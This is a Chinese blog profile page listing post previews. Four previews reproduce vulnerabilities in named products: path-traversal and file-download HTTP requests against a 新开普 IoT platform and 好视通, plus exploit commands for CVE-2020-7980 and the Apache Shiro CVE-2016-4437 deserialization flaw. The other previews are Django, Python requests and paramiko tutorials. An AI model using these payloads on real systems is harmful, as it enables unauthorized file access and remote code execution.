- 博客(7)
- 问答 (4)
- 收藏
- 关注
原创 2020-12-22
新开普电子股份有限公司_任意文件下载 物联网平台 GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate Host: 127.0.0.1:8080 User-Agen
2020-12-22 08:50:57
1042
1
原创 2020-12-22
深圳银澎云计算有限公司任意文件下载 好视通 GET /register/toDownload.do?fileName=…/WEB-INF/web.xml HTTP/1.1 Referer: http://127.0.0.1:8086/ Cookie: JSESSIONID=49053781E7D31521EBD73EBE85A031C2;mldn-session-id=8c35b1b1-2ab3-45a0-b86a-f107b2b02fcb Accept: textml,application/xhtml
2020-12-22 08:44:52
270
原创 CVE-2020-7980
影响版本 Intellian v1.12, v1.21, v1.24. ```python poc CVE-2020-7980 https://github.com/Xh4H/Satellian-CVE-2020-7980 python satellian.py -u http://xxx.com
2020-07-29 17:21:55
790
原创 Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 1.搭建好环境 2.复现 http://目标IP:8080 python shiro_exploit.py -u http://ip:80
2020-07-14 16:35:35
976
1
原创 django安装, 创建第一个项目
Django 下载地址:https://www.djangoproject.com/download/ 或者pip命令 或者pip命令 pip install Django 安装指定版本 pip install Django=2.1 django-admin startproject demo cd demo python3 manage.py runserver 0.0.0.0:8000 ...
2020-04-17 14:24:31
120
原创 Python3 Requests 模块
Python3 Requests 模块 首先安装 requests pip install requests 发送get请求 设置超时时间 timeout 单位秒 import requests url r = r"https://www.baidu.com/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x6...
2020-04-14 21:18:18
233
原创 python
python Python ssh 连接 安装库 paramiko linux pip3 install paramiko win pip install paramiko import paramiko #创建一个ssh的客户端,用来连接服务器 ssh = paramiko.SSHClient() #创建一个ssh的白名单 know...
2020-04-14 20:50:24
151
空空如也
一个c++的小问题 fin >> num; fin.get(); 上面2句是什么意思
2017-02-06
关于C++中逗号运算符 为什么运行不起来呀 还出现很多的错误
2016-12-29
C++编写延时循环有大神帮我一下吗?万分感谢!!!!
2016-12-31
大神们 C++中逗号运算符
2016-12-29
TA创建的收藏夹 TA关注的收藏夹
TA关注的人